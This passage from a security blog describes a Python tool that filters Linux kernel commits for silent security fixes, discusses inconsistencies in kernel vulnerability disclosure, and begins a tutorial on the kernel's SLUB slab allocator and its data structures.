<p>This has been up for debate within the community since at least 2008, as we can see from this post on the <a href="https://seclists.org/fulldisclosure/">Full Disclosure</a> mailing list, titled &ldquo;<a href="https://seclists.org/fulldisclosure/2008/Jul/276">Linux&rsquo;s unofficial security-through-coverup policy</a>&rdquo; by <a href="https://twitter.com/spendergrsec">@spendergrsec</a>.</p>
<p>Now as I mentioned earlier, a lot has changed since then, and our perception of security has come a long way. However, over the years there have still been cases of, at worst, silent security fixes or, at best, inconsistency in the handling of security fixes[5][6][7][8].</p>
<h3 id="the-plan">the plan</h3>
<p><img src="https://sam4k.com/content/images/2023/02/piqued_interest.gif" alt=""></p>
<p>Putting this all together, I was interested in analysing Linux kernel commits in a somewhat automated way such that I could filter for security fixes and explore trends.</p>
<p>With full understanding that I&rsquo;m no data scientist or software engineer, I whipped up a quick (and very hacky) tool to delve around a bit and have some fun.</p>
<hr>
<ol>
<li><a href="https://en.wikipedia.org/wiki/Linux_kernel">https://en.wikipedia.org/wiki/Linux_kernel</a></li>
<li><a href="https://www.kernel.org/doc/html/latest/process/submitting-patches.html">https://www.kernel.org/doc/html/latest/process/submitting-patches.html</a></li>
<li><a href="https://www.kernel.org/category/releases.html">https://www.kernel.org/category/releases.html</a></li>
<li><a href="https://github.com/hardenedlinux/grsecurity-101-tutorials/blob/master/kernel_vuln_exp.md#silent-fixes-from-linux-kernel-community--welcome-to-add-more-for-fun">https://github.com/hardenedlinux/grsecurity-101-tutorials/blob/master/kernel_vuln_exp.md#silent-fixes-from-linux-kernel-community&ndash;welcome-to-add-more-for-fun</a></li>
<li><a href="https://arstechnica.com/information-technology/2013/05/critical-linux-vulnerability-imperils-users-even-after-silent-fix/">https://arstechnica.com/information-technology/2013/05/critical-linux-vulnerability-imperils-users-even-after-silent-fix/</a></li>
<li><a href="https://seclists.org/oss-sec/2022/q2/134">CVE-2022-1786</a> was UAF leading to LPE, with no mention in the <a href="https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git/commit/?h=linux-5.10.y&amp;id=29f077d070519a88a793fbc70f1e6484dc6d9e35">fix commit</a></li>
<li><a href="https://seclists.org/oss-sec/2022/q4/30">CVE-2022-2602</a> was a UAF leading to LPE, with no mention in the <a href="https://github.com/torvalds/linux/commit/0091bfc81741b8d3aeb3b7ab8636f911b2de6e80">fix commit</a></li>
<li><a href="https://seclists.org/oss-sec/2021/q3/181">CVE-2021-41073</a> was disclosed by <a href="https://twitter.com/chompie1337">@chompie1337</a>, although the <a href="https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=16c8d2df7ec0eed31b7d3b61cb13206a7fb930cc">fix commit</a> has no mention of the exploitability and they also asked her to use a non-security related email for the &ldquo;Reported-by&rdquo; ack (as mentioned in <a href="https://twitter.com/chompie1337">@chompie1337</a>&rsquo;s article <a href="https://s3.eu-west-1.amazonaws.com/www.thinkst.com/thinkstscapes/ThinkstScapes-2022-Q1-highres.pdf">here</a>)</li>
</ol>
<h2 id="lica">Lica</h2>
<p><img src="https://sam4k.com/content/images/2023/01/digusted_screen.gif" alt=""></p>
<p>get ready for some peak xdev-ctf-poc-tier code</p>
<p>Let&rsquo;s talk about the tool! I&rsquo;ll try keep this brief, both for my dignity and your sanity. I put together this tool using Python to parse kernel commits and try filter them for interesting security related fixes as well as any interesting stats along the way.</p>
<p><a href="https://github.com/sam4k/lica">sam4k/lica</a></p>
<p>Thanks to the kernel patch submission guidelines<a href="https://www.kernel.org/doc/html/latest/process/submitting-patches.html">[1]</a>, there&rsquo;s some level of consistency in what to expect a commit to contain, which helps us filter down the 34000 or so commits in the last 6 months to around 135 possible security fixes - neat!</p>
<div class="highlight"><pre tabindex="0" class="chroma"><code class="language-fallback" data-lang="fallback"><span class="line"><span class="cl">Commit...... | Subsystem......... | Hits.................................... | CVE............. | Reporter.......................................... | Coverage.......
</span></span><span class="line"><span class="cl">----------------------------------------------------------------------------------------------------------------------------------------------------------------------
</span></span><span class="line"><span class="cl">...
</span></span><span class="line"><span class="cl">331cd9461412 | btrfs              | use-after-free                           |                  | Ye Bin &lt;yebin10@huawei.com&gt;                        | linux-5.15.90, linux-5.10.165, linux-5.4.230
</span></span><span class="line"><span class="cl">...
</span></span><span class="line"><span class="cl">cf6531d98190 | ksmbd              | use-after-free                           |                  | zdi-disclosures@trendmicro.com # ZDI-CAN-17816     | N/A            
</span></span><span class="line"><span class="cl">...          
</span></span><span class="line"><span class="cl">----------------------------------------------------------------------------------------------------------------------------------------------------------------------
</span></span><span class="line"><span class="cl">Now For The Stats...
</span></span><span class="line"><span class="cl">----------------------------------------------------------------------------------------------------------------------------------------------------------------------
</span></span><span class="line"><span class="cl">[+] 133 commits where matched from 2448 fixes, over 33487 commits.
</span></span><span class="line"><span class="cl">[+] 36 / 133 listed a reporter.
</span></span><span class="line"><span class="cl">[+] 2 / 133 mentioned a CVE.
</span></span><span class="line"><span class="cl">[+] Breakdown by category:
</span></span><span class="line"><span class="cl">|---- UAF: 95
</span></span><span class="line"><span class="cl">|---- Races: 22
</span></span><span class="line"><span class="cl">|---- Generic: 15
</span></span><span class="line"><span class="cl">|---- Info Leak: 10
</span></span><span class="line"><span class="cl">|---- Stack Overflow: 2
</span></span><span class="line"><span class="cl">...
</span></span><span class="line"><span class="cl">[+] Breakdown by module:
</span></span><span class="line"><span class="cl">|---- mm: 11
</span></span><span class="line"><span class="cl">|---- wifi: 10
</span></span><span class="line"><span class="cl">|---- drm: 8
</span></span><span class="line"><span class="cl">|---- media: 6
</span></span><span class="line"><span class="cl">|---- net: 5
</span></span><span class="line"><span class="cl">|---- cifs: 4
</span></span><span class="line"><span class="cl">|---- io_uring: 4
</span></span><span class="line"><span class="cl">...
</span></span></code></pre></div><p>output for the last 6 months or so, checking for coverage in latest 5.15, 5.10, 5.4 at the time</p>
<p>Above is a sample output from Lica, analysing kernel commits over the past 180 days. Here I&rsquo;ve used a really basic approach of looking for fixes via keyword in the commit summary phrase and then further filtering those fixes by looking for hits in a dictionary of common bug classes/terminology, grouped by category.</p>
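<p>For a flavour of what that two-stage filter looks like, here&rsquo;s a minimal sketch. To be clear, this isn&rsquo;t lifted from Lica: the patterns, category names and commit messages below are all invented for illustration.</p>

```python
import re
from collections import Counter

# Hypothetical patterns; Lica's real configuration may differ.
FIX_SUMMARY = re.compile(r"\bfix(es|ed)?\b", re.IGNORECASE)
BUG_CLASSES = {
    "UAF": [r"use[- ]after[- ]free", r"\buaf\b"],
    "Races": [r"race condition", r"\bdata race\b"],
    "Info Leak": [r"info(rmation)? leak", r"uninit(ialized|ialised)? (memory|value)"],
}


def classify(message):
    """Return the categories a fix commit hits, or [] if it isn't a fix."""
    summary = message.splitlines()[0] if message else ""
    if not FIX_SUMMARY.search(summary):
        return []  # stage 1: the summary line doesn't look like a fix
    return [
        category
        for category, patterns in BUG_CLASSES.items()
        if any(re.search(p, message, re.IGNORECASE) for p in patterns)
    ]  # stage 2: dictionary hits anywhere in the message


# Made-up commit messages standing in for real git log output.
commits = [
    "btrfs: fix use-after-free in example_func\n\nKASAN reported a use-after-free ...",
    "docs: update maintainers entry",
    "net: fix race condition in example teardown path",
]
stats = Counter(cat for msg in commits for cat in classify(msg))
print(dict(stats))
```

<p>Keeping the dictionary as plain data makes it easy to bolt on new categories or swap in a different set of terms without touching the matching logic.</p>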
<p>A (slightly) more nuanced approach, looking at some of the &ldquo;silent fixes&rdquo; from earlier, would be to grep for typical <em>causes</em> for bug classes + the omission of bug classes. A simple example might be <code>check.*len</code> for missing length checks.</p>
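<p>A rough sketch of that idea might look like the following, flagging messages that describe a typical bug <em>cause</em> while never naming a bug class. Other than <code>check.*len</code>, the patterns here are my own guesses at what such a dictionary could contain, and the example messages are made up.</p>

```python
import re

# Hypothetical dictionaries, for illustration only.
CAUSE_PATTERNS = [r"check.*len", r"missing .*check", r"bounds? check"]
SECURITY_TERMS = [r"overflow", r"use[- ]after[- ]free", r"CVE-\d{4}-\d+", r"exploit"]


def matches_any(patterns, text):
    """True if any pattern matches somewhere in text (case-insensitive)."""
    return any(re.search(p, text, re.IGNORECASE) for p in patterns)


def looks_like_quiet_fix(message):
    """Describes a typical bug cause without naming a bug class."""
    return matches_any(CAUSE_PATTERNS, message) and not matches_any(SECURITY_TERMS, message)


examples = [
    "example: check the len of the user supplied buffer before copying",
    "example: fix buffer overflow by adding a missing length check",
    "example: tidy up comments",
]
for msg in examples:
    print(looks_like_quiet_fix(msg), "-", msg)
```

<p>Only the first message is flagged: the second names the bug class outright (so the basic dictionary would already catch it) and the third doesn&rsquo;t describe a cause at all.</p>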
<p>It&rsquo;s worth noting that while we can use a basic dictionary or even filter by specific reporters (I&rsquo;m looking at you ZDI), using a bug cause focused dictionary (that omits security-centric terms) yields just as many results.</p>
<p>While this produces more false positives, I think it reiterates that a determined attacker doesn&rsquo;t need to just grep for &ldquo;buffer overflow privesc&rdquo; or a CVE to find potentially exploitable vulnerabilities, whether that&rsquo;s by manually enumerating commits or by using an approach like this, which takes a few hours to put together. That makes me wonder why we have cases such as a researcher being asked to use a non-security-related email for the &ldquo;Reported-by&rdquo; ack[2]??</p>
<p>Back to Lica, I also include a naive check to see if a particular kernel release has the patch, for checking older LTS kernels for backports (the <code>Coverage</code> column). There&rsquo;s no doubt an easier and more reliable way to do this, but hey-ho, this did the trick for now.</p>
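<p>One possible way to do such a check (not necessarily how Lica does it) leans on the stable tree convention of citing the mainline commit in the backport&rsquo;s message, either as <code>commit SHA upstream.</code> or <code>[ Upstream commit SHA ]</code>. The sketch below works on commit messages you&rsquo;ve already pulled from a stable branch; the function names and the SHA are made up for the demo.</p>

```python
import re

# Stable backports conventionally cite the mainline commit in their message,
# e.g. "commit SHA upstream." or "[ Upstream commit SHA ]".
UPSTREAM_REF = re.compile(
    r"^\s*(?:\[ Upstream commit ([0-9a-f]{40}) \]|commit ([0-9a-f]{40}) upstream\.?)\s*$",
    re.IGNORECASE | re.MULTILINE,
)


def upstream_shas(message):
    """Full mainline SHAs referenced by a stable commit message."""
    return {(a or b).lower() for a, b in UPSTREAM_REF.findall(message)}


def has_backport(short_sha, stable_messages):
    """True if any stable commit message cites a SHA starting with short_sha."""
    return any(
        sha.startswith(short_sha.lower())
        for message in stable_messages
        for sha in upstream_shas(message)
    )


FAKE_SHA = "0123456789abcdef0123456789abcdef01234567"  # made-up SHA for the demo
stable_log = [
    f"example: fix something\n\ncommit {FAKE_SHA} upstream.\n\nDetails ...",
    "example: unrelated stable-only change",
]
print(has_backport("0123456789ab", stable_log))
print(has_backport("ffffffffffff", stable_log))
```

<p>This will miss backports that were reworked without the upstream reference, so treat a miss as &ldquo;unknown&rdquo; rather than &ldquo;unpatched&rdquo;.</p>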
<p>Anyways, I tried to make this somewhat extensible and configurable, so I&rsquo;ve chucked it up on GitHub in case anyone is interested in having a play with it. You&rsquo;ve been warned about the quality!</p>
<hr>
<ol>
<li><a href="https://www.kernel.org/doc/html/latest/process/submitting-patches.html">https://www.kernel.org/doc/html/latest/process/submitting-patches.html</a></li>
<li><a href="https://seclists.org/oss-sec/2021/q3/181">CVE-2021-41073</a> was disclosed by <a href="https://twitter.com/chompie1337">@chompie1337</a>, although the <a href="https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=16c8d2df7ec0eed31b7d3b61cb13206a7fb930cc">fix commit</a> has no mention of the exploitability and they also asked her to use a non-security related email for the &ldquo;Reported-by&rdquo; ack (as mentioned in <a href="https://twitter.com/chompie1337">@chompie1337</a>&rsquo;s article <a href="https://s3.eu-west-1.amazonaws.com/www.thinkst.com/thinkstscapes/ThinkstScapes-2022-Q1-highres.pdf">here</a>)</li>
</ol>
<h2 id="takeaways">Takeaways</h2>
<p><img src="https://sam4k.com/content/images/2023/02/feeling_takeaway.gif" alt=""></p>
<p>Despite not getting to spend much time fine tuning or tweaking the tool to do some in-depth analysis, it&rsquo;s been a fun little project and broaches an important discussion.</p>
<p>It does feel like, as a security researcher, there is still a lack of transparency and consistency in the processes and handling of security disclosures and fixes in the kernel.</p>
<p>Whether there&rsquo;s intentional omission of security relevant information or just a difference in opinion on what constitutes relevant information, the end result is still a lack of consistency in how reported security issues are handled.</p>
<p>For example, I wrote about my experience disclosing a kernel vulnerability at the beginning of 2022<a href="https://sam4k.com/a-dummys-guide-to-disclosing-linux-kernel-vulnerabilities/">[1]</a>. While the process was a bit convoluted for me, after getting in touch with the right folks, I had no issues with communication and the commit referenced the reporter, CVE and vulnerability being fixed<a href="https://github.com/torvalds/linux/commit/9aa422ad326634b76309e8ff342c246800621216">[2]</a>.</p>
<p>However, as I touched on earlier in the post, other researchers have had different experiences and the resulting patches can vary in their security relevant content.</p>
<h3 id="on-disclosures">On Disclosures</h3>
<p><img src="https://sam4k.com/content/images/2023/02/dont-make-me-go-back.gif" alt=""></p>
<p>If you want to report a kernel vulnerability, you&rsquo;ll typically end up staring at two pages:</p>
<ol>
<li>The official kernel documentation on &ldquo;Security Bugs&rdquo;<a href="https://www.kernel.org/doc/html/latest/admin-guide/security-bugs.html">[3]</a>[4],</li>
<li>The <code>linux-distros</code> mailing list wiki page<a href="https://oss-security.openwall.org/wiki/mailing-lists/distros#how-to-use-the-lists">[5]</a></li>
</ol>
<p>The tl;dr here is the kernel security team&rsquo;s focus is solely on finding and applying a fix for security bugs. If you want to allocate a CVE or inform vendors of the security impact (LPE, RCE etc.), then you need to coordinate with the <code>linux-distros</code> list too.</p>
<p>There&rsquo;s been a history of friction between the policies of the two bodies, with security researchers getting caught up between the two. The most recent instance being the public disclosure of CVE-2023-0179 over on oss-security<a href="https://seclists.org/oss-sec/2023/q1/22">[6]</a>.</p>
<p>Unfortunately I don&rsquo;t fully understand the root cause of the misunderstanding. As Solar Designer points out, this seems to stem from a policy change made to accommodate the kernel security team<a href="https://www.openwall.com/lists/oss-security/2022/05/24/1">[8]</a>, as part of a wider discussion on <code>linux-distros</code> policy last year<a href="https://seclists.org/oss-sec/2022/q2/99">[9]</a>, but I&rsquo;m not entirely sure what policy this disclosure broke on the kernel documentation for &ldquo;Security Bugs&rdquo;<a href="https://www.kernel.org/doc/html/latest/admin-guide/security-bugs.html">[3]</a>.</p>
<p>Beyond highlighting the work required on the part of the researcher to make sure they follow the right steps and policies, this instance also shows where this rift might end up if things carry on the way they are, with Solar Designer commenting:</p>
<blockquote>
<p>It may well be the last straw that will result in Linux kernel documentation getting updated so that reporters would not be instructed to contact linux-distros anymore (or would even be instructed not to?)  On one hand, this is bad.  On the other, everyone is tired of the inconsistencies and the drama.</p>
</blockquote>
<p>Solar Designer then goes on to explain a potential solution to ensure oss-security still keeps up-to-date with kernel security issues if things do go south:</p>
<blockquote>
<p>I suppose we (oss-security community?) could want to setup a crawler detecting likely security issues on Linux kernel mailing lists and among Linux kernel commits (including branches).  This could detect even more issues than are being brought to linux-distros and oss-security now.</p>
</blockquote>
<p>While somewhat ironic given the topic of this post (not that my code is fit for scale lol), it&rsquo;s a shame that there&rsquo;s still discord regarding the handling of kernel security issues when this is a debate that&rsquo;s been going on for so many years at this point.</p>
<p>I don&rsquo;t have all the information or experience to suggest any solutions for a decades-long pain point, but I do hope there&rsquo;s one out there and we can find it soon.</p>
<p>Transparency and consistency surrounding these processes help to encourage researchers to participate in coordinated vulnerability disclosure for kernel vulns. Having more clarity around the handling and state of security fixes should also help vendors and such, as well as help us as a community to continue to progress with regards to our attitude and approach to security.</p>
<hr>
<ol>
<li><a href="https://sam4k.com/a-dummys-guide-to-disclosing-linux-kernel-vulnerabilities/">https://sam4k.com/a-dummys-guide-to-disclosing-linux-kernel-vulnerabilities/</a></li>
<li><a href="https://github.com/torvalds/linux/commit/9aa422ad326634b76309e8ff342c246800621216">https://github.com/torvalds/linux/commit/9aa422ad326634b76309e8ff342c246800621216</a></li>
<li><a href="https://www.kernel.org/doc/html/latest/admin-guide/security-bugs.html">https://www.kernel.org/doc/html/latest/admin-guide/security-bugs.html</a></li>
<li>small note, the first result on google for me is actually an older copy, from the 4.14 kernel which omits some clarity found in the latest versions</li>
<li><a href="https://oss-security.openwall.org/wiki/mailing-lists/distros#how-to-use-the-lists">https://oss-security.openwall.org/wiki/mailing-lists/distros#how-to-use-the-lists</a></li>
<li><a href="https://seclists.org/oss-sec/2023/q1/22">https://seclists.org/oss-sec/2023/q1/22</a></li>
<li><a href="https://www.openwall.com/lists/oss-security/2022/05/24/1">https://www.openwall.com/lists/oss-security/2022/05/24/1</a></li>
<li><a href="https://seclists.org/oss-sec/2022/q2/99">https://seclists.org/oss-sec/2022/q2/99</a></li>
<li><a href="https://seclists.org/oss-sec/2022/q4/221">https://seclists.org/oss-sec/2022/q4/221</a></li>
</ol>
<h2 id="conclusion">Conclusion</h2>
<p><img src="https://sam4k.com/content/images/2023/02/calming.gif" alt=""></p>
<p>Well, this one was a bit of a change of pace for me and was a step out of my comfort zone, considering I normally focus on more objective, technical subjects. That probably explains why it took so much longer to write!</p>
<p>Hopefully I didn&rsquo;t stir the pot too much; my goals for this post were to share some takeaways from a project that otherwise would have been relegated to the recycling bin as well as shed some light on a relevant and important topic within the community.</p>
<p>Despite my criticism of the current status quo, I have a lot of respect for the time and effort put in by all of those involved in the Linux kernel community.</p>
<p>Fingers crossed this was interesting for those of you that made it this far, but don&rsquo;t fear, I&rsquo;ve got some more technical posts lined up for both kernel exploitation and internals!</p>
<p>exit(0);</p>
]]></content:encoded></item><item><title>Linternals: The Slab Allocator</title><description>This time we&amp;#39;re going to build on that and introduce another memory allocator found within the Linux kernel, the slab allocator, and it&amp;#39;s various flavours. So buckle up as we dive into the exciting world of SLABs, SLUBs and SLOBs.</description><link>https://sam4k.com/linternals-memory-allocators-0x02/</link><guid isPermaLink="false">6311d87a92020209c38fb7ba</guid><category>linux</category><category>kernel</category><category>memory</category><dc:creator>sam4k</dc:creator><pubDate>Wed, 09 Nov 2022 15:04:00 +0000</pubDate><media:content url="https://sam4k.com/content/images/2022/09/linternals.gif" medium="image"/><content:encoded><![CDATA[<p>The monthly blog schedule has gone somewhat awry, but fear not, today we&rsquo;re diving back into our Linternals series on memory allocators!</p>
<p>I know it&rsquo;s been a while, I&rsquo;ve been sidetracked with the new job and some cool personal projects, so let&rsquo;s quickly highlight what we covered <a href="https://sam4k.com/linternals-memory-allocators-part-1">last time</a>:</p>
<ul>
<li>what we mean by memory allocators</li>
<li>key memory concepts such as pages, page frames, nodes and zones</li>
<li>piecing this together to explain the underlying allocator used by the Linux kernel, the buddy (or page) allocator, as well as touching on its API, pros and cons</li>
</ul>
<p>This time we&rsquo;re going to build on that and introduce another memory allocator found within the Linux kernel, the slab allocator, and its various flavours. So buckle up as we dive into the exciting world of SLABs, SLUBs and SLOBs.</p>
<p><img src="https://sam4k.com/content/images/2022/10/what_you_said-makes_no_sense.gif" alt=""></p>
<h2 id="contents">Contents</h2>
<ul>
<li><a href="#0x03-the-slab-allocator">0x03 The Slab Allocator</a>
<ul>
<li><a href="#the-basics">The Basics</a></li>
<li><a href="#data-structures">Data Structures</a>
<ul>
<li><a href="#struct-kmemcache">struct kmem_cache</a></li>
<li><a href="#struct-kmemcachecpu">struct kmem_cache_cpu</a></li>
<li><a href="#struct-kmemcachenode">struct kmem_cache_node</a></li>
<li><a href="#struct-slab">struct slab</a></li>
<li><a href="#wrap-up">Wrap-up</a></li>
</ul>
</li>
<li><a href="#the-api">The API</a>
<ul>
<li><a href="#kmalloc-kfree">kmalloc &amp; kfree</a></li>
<li><a href="#kmemcachecreate">kmem_cache_create</a></li>
<li><a href="#kmemcachealloc">kmem_cache_alloc</a></li>
<li><a href="#cache-aliases">slab aliases</a></li>
</ul>
</li>
<li><a href="#seeing-it-in-action">Seeing It In Action</a>
<ul>
<li><a href="#procslabinfo">/proc/slabinfo</a></li>
<li><a href="#slabtop">slabtop</a></li>
<li><a href="#slabinfo">slabinfo</a></li>
<li><a href="#debugging">debugging</a></li>
<li><a href="#slxbtrace-ebpf">slxbtrace (ebpf)</a></li>
</ul>
</li>
<li><a href="#wrapping-up">Wrapping Up</a></li>
</ul>
</li>
<li><a href="#next-time">Next Time!</a></li>
</ul>
<h2 id="0x03-the-slab-allocator">0x03 The Slab Allocator</h2>
<p>The slab allocator is another memory allocator used by the Linux kernel and, as we touched on last time, &ldquo;sits on top of the buddy allocator&rdquo;.</p>
<p>What I mean by this, is that while the slab allocator is another kernel memory allocator it doesn&rsquo;t replace the buddy allocator. Instead it introduces a new API and features for kernel developers (which we&rsquo;ll cover soon), but under the hood it uses the buddy allocator too.</p>
<p>So why use the slab allocator? Well, last time we touched on some of the issues and drawbacks with the buddy allocator. The purpose of the slab allocator is to<a href="https://www.kernel.org/doc/gorman/html/understand/understand011.html">[1]</a>:</p>
<ul>
<li>reduce internal fragmentation,</li>
<li>cache commonly used objects,</li>
<li>better utilise the hardware cache by aligning objects to the L1 or L2 caches</li>
</ul>
<p>So while the buddy allocator excels at allocating large chunks of physically contiguous memory, the slab allocator provides better performance to kernel developers for smaller and more common allocations (which happen more often than you might think!).</p>
<p>Before we dive into some more detail and explain how the kernel&rsquo;s slab allocator achieves this, I should highlight that the term &ldquo;slab allocator&rdquo; refers to a generic memory management implementation.</p>
<p>The Linux kernel actually has three such implementations: SLAB[2], SLUB and SLOB. SLUB is what you&rsquo;re likely to see on modern desktops and servers[3], so <strong>we&rsquo;ll be focusing on this implementation</strong> throughout this post, but I&rsquo;ll touch on the others later.</p>
<p>If you&rsquo;re interested in its origins, slab allocation was first introduced by Jeff Bonwick back in the 90&rsquo;s and you can read his paper &ldquo;The Slab Allocator: An Object-Caching Kernel Memory Allocator&rdquo; over on USENIX.<a href="http://www.usenix.org/publications/library/proceedings/bos94/full_papers/bonwick.ps">[4]</a> [5]</p>
<hr>
<ol>
<li><a href="https://www.kernel.org/doc/gorman/html/understand/understand011.html">https://www.kernel.org/doc/gorman/html/understand/understand011.html</a></li>
<li>Note that &ldquo;slab allocator&rdquo; != &ldquo;slab&rdquo; != &ldquo;SLAB&rdquo;, confusing ik</li>
<li>SLUB has been the default since 2.6.23 (~2008), so by likely I mean <em><strong>very likely</strong></em></li>
<li><a href="https://www.usenix.org/biblio-4248">http://www.usenix.org/publications/library/proceedings/bos94/full_papers/bonwick.ps</a></li>
<li>Thanks <a href="https://infosec.exchange/web/@bsmaalders@mas.to">@bsmaalders@mas.to</a> for the reminder to include this here :)</li>
</ol>
<h3 id="the-basics">The Basics</h3>
<p><img src="https://sam4k.com/content/images/2022/10/let_us_begin.gif" alt=""></p>
<p>At a high level, there&rsquo;s 3 main parts to the SLUB allocator: <strong>caches</strong>, <strong>slabs</strong> and <strong>objects</strong>.</p>
<p><img src="https://sam4k.com/content/images/2022/10/simple_cache.png" alt=""></p>
<p>As we can see, these form a pretty straightforward hierarchy. <strong>Objects</strong> (i.e. stuff being allocated by the kernel) of a particular type or size are organised into <strong>caches</strong>.</p>
<p><strong>Objects</strong> belonging to a <strong>cache</strong> are further grouped into <strong>slabs</strong>, which will be of a fixed size and contain a fixed number of <strong>objects.</strong></p>
<p><strong>Objects</strong> in this context are just allocations of a particular size. For example, when a process opens a <code>seq_file</code><a href="https://www.kernel.org/doc/html/latest/filesystems/seq_file.html">[1]</a> in Linux, the kernel will allocate space for <a href="https://elixir.bootlin.com/linux/v6.0.6/source/include/linux/seq_file.h#L32"><code>struct seq_operations</code></a> using the slab allocator API. This will be a 32 byte object.</p>
<p><img src="https://sam4k.com/content/images/2022/10/simple_cache_meta-2.png" alt=""></p>
<p>Among other things, the cache will keep tabs on which slabs are full, which slabs are partially full and which slabs are empty. Free objects within a slab will form a linked list, each pointing to the next free object within that slab.</p>
<p>So when the kernel wants to make an allocation via the SLUB allocator, it will find the right cache (depending on type/size) and then find a partial slab to allocate that object.</p>
<p>If there are no partial or free slabs, the SLUB allocator will allocate some new slabs via the buddy allocator. Yep, there it is, we&rsquo;re full circle now. The slabs themselves are allocated and freed using the buddy allocator we touched on last time.</p>
<p>Knowing this we can deduce that each slab is at least <code>PAGE_SIZE</code> bytes and is physically contiguous; we&rsquo;ll touch more on the details in a bit!</p>
<hr>
<ol>
<li><a href="https://www.kernel.org/doc/html/latest/filesystems/seq_file.html">https://www.kernel.org/doc/html/latest/filesystems/seq_file.html</a></li>
</ol>
<h3 id="data-structures">Data Structures</h3>
<p><img src="https://sam4k.com/content/images/2022/10/about_to_get_real.gif" alt=""></p>
<p>In the last section we covered slab allocator 101 - a simplified overview of caches, slabs and objects. Surprise, surprise: the kernel implementation is a tad more complex!</p>
<p>I think the approach I&rsquo;ll take here is to just dive right into the data structures behind the SLUB implementation and we&rsquo;ll expand from there and see how it goes?!</p>
<p>So let&rsquo;s take a quick look at some of the kernel data structures we&rsquo;re interested in when looking at the SLUB implementation:</p>
<ul>
<li><a href="https://elixir.bootlin.com/linux/v6.0.6/source/include/linux/slub_def.h#L90"><code>struct kmem_cache</code></a>: represents a specific cache of objects, storing all the metadata and info necessary for managing the cache</li>
<li><a href="https://elixir.bootlin.com/linux/v6.0.6/source/include/linux/slub_def.h#L48"><code>struct kmem_cache_cpu</code></a>: this is a per-cpu structure which represents the &ldquo;active&rdquo; slab for a particular <code>kmem_cache</code> on that CPU (I&rsquo;ll explain this soon, dw!)</li>
<li><a href="https://elixir.bootlin.com/linux/v6.0.6/source/mm/slab.h#L741"><code>struct kmem_cache_node</code></a>: this is a per-node (NUMA node) structure which tracks the partial and full slabs for a particular <code>kmem_cache</code> on that node that aren&rsquo;t currently &ldquo;active&rdquo;</li>
<li><a href="https://elixir.bootlin.com/linux/v6.0.6/source/mm/slab.h#L9"><code>struct slab</code></a>: this structure, as you probably guessed, represents an individual slab and was introduced in 5.17<a href="https://lwn.net/Articles/881039/">[1]</a> (previously this information would be accessed directly from <a href="https://elixir.bootlin.com/linux/v5.17/source/include/linux/mm_types.h#L72"><code>struct page</code></a>, but more on that soon!)</li>
</ul>
<h4 id="struct-kmemcache">struct kmem_cache</h4>
<div class="highlight"><pre tabindex="0" class="chroma"><code class="language-C" data-lang="C"><span class="line"><span class="cl"><span class="k">struct</span> <span class="n">kmem_cache</span> <span class="p">{</span>
</span></span><span class="line"><span class="cl">	<span class="k">struct</span> <span class="n">kmem_cache_cpu</span> <span class="n">__percpu</span> <span class="o">*</span><span class="n">cpu_slab</span><span class="p">;</span>
</span></span><span class="line"><span class="cl">	<span class="kt">slab_flags_t</span> <span class="n">flags</span><span class="p">;</span>
</span></span><span class="line"><span class="cl">	<span class="kt">unsigned</span> <span class="kt">long</span> <span class="n">min_partial</span><span class="p">;</span>
</span></span><span class="line"><span class="cl">	<span class="kt">unsigned</span> <span class="kt">int</span> <span class="n">size</span><span class="p">;</span>
</span></span><span class="line"><span class="cl">	<span class="kt">unsigned</span> <span class="kt">int</span> <span class="n">object_size</span><span class="p">;</span>
</span></span><span class="line"><span class="cl">	<span class="k">struct</span> <span class="n">reciprocal_value</span> <span class="n">reciprocal_size</span><span class="p">;</span>
</span></span><span class="line"><span class="cl">	<span class="kt">unsigned</span> <span class="kt">int</span> <span class="n">offset</span><span class="p">;</span>	
</span></span><span class="line"><span class="cl"><span class="cp">#ifdef CONFIG_SLUB_CPU_PARTIAL
</span></span></span><span class="line"><span class="cl">	<span class="kt">unsigned</span> <span class="kt">int</span> <span class="n">cpu_partial</span><span class="p">;</span>
</span></span><span class="line"><span class="cl">	<span class="kt">unsigned</span> <span class="kt">int</span> <span class="n">cpu_partial_slabs</span><span class="p">;</span>
</span></span><span class="line"><span class="cl"><span class="cp">#endif
</span></span></span><span class="line"><span class="cl">	<span class="k">struct</span> <span class="n">kmem_cache_order_objects</span> <span class="n">oo</span><span class="p">;</span>
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl">	<span class="cm">/* Allocation and freeing of slabs */</span>
</span></span><span class="line"><span class="cl">	<span class="k">struct</span> <span class="n">kmem_cache_order_objects</span> <span class="n">min</span><span class="p">;</span>
</span></span><span class="line"><span class="cl">	<span class="kt">gfp_t</span> <span class="n">allocflags</span><span class="p">;</span>	
</span></span><span class="line"><span class="cl">	<span class="kt">int</span> <span class="n">refcount</span><span class="p">;</span>		<span class="cm">/* Refcount for slab cache destroy */</span>
</span></span><span class="line"><span class="cl">	<span class="kt">void</span> <span class="p">(</span><span class="o">*</span><span class="n">ctor</span><span class="p">)(</span><span class="kt">void</span> <span class="o">*</span><span class="p">);</span>
</span></span><span class="line"><span class="cl">	<span class="p">...</span>
</span></span><span class="line"><span class="cl">	<span class="k">const</span> <span class="kt">char</span> <span class="o">*</span><span class="n">name</span><span class="p">;</span>	<span class="cm">/* Name (only for display!) */</span>
</span></span><span class="line"><span class="cl">	<span class="k">struct</span> <span class="n">list_head</span> <span class="n">list</span><span class="p">;</span>	<span class="cm">/* List of slab caches */</span>
</span></span><span class="line"><span class="cl">	<span class="p">...</span>
</span></span><span class="line"><span class="cl">	<span class="k">struct</span> <span class="n">kmem_cache_node</span> <span class="o">*</span><span class="n">node</span><span class="p">[</span><span class="n">MAX_NUMNODES</span><span class="p">];</span>
</span></span><span class="line"><span class="cl"><span class="p">};</span>
</span></span></code></pre></div><p>comments stripped for redundancy, from <a href="https://elixir.bootlin.com/linux/v6.0.6/source/include/linux/slub_def.h#L90">/include/linux/slub_def.h</a></p>
<p>As you might expect from the structure that underpins the SLUB allocator&rsquo;s cache implementation, there&rsquo;s a lot to unpack here! Let&rsquo;s break down the key bits.</p>
<p><code>name</code> stores the printable name for the cache, e.g. seen in the command <code>slabtop</code> (we&rsquo;ll cover introspection more later). Nothing wild here.</p>
<p><code>object_size</code> is the size, in bytes, of the objects (read: allocations) in this cache excluding metadata, whereas <code>size</code> is the size, in bytes, including any metadata. Typically there is no additional metadata stored in SLUB objects, so these will be the same.</p>
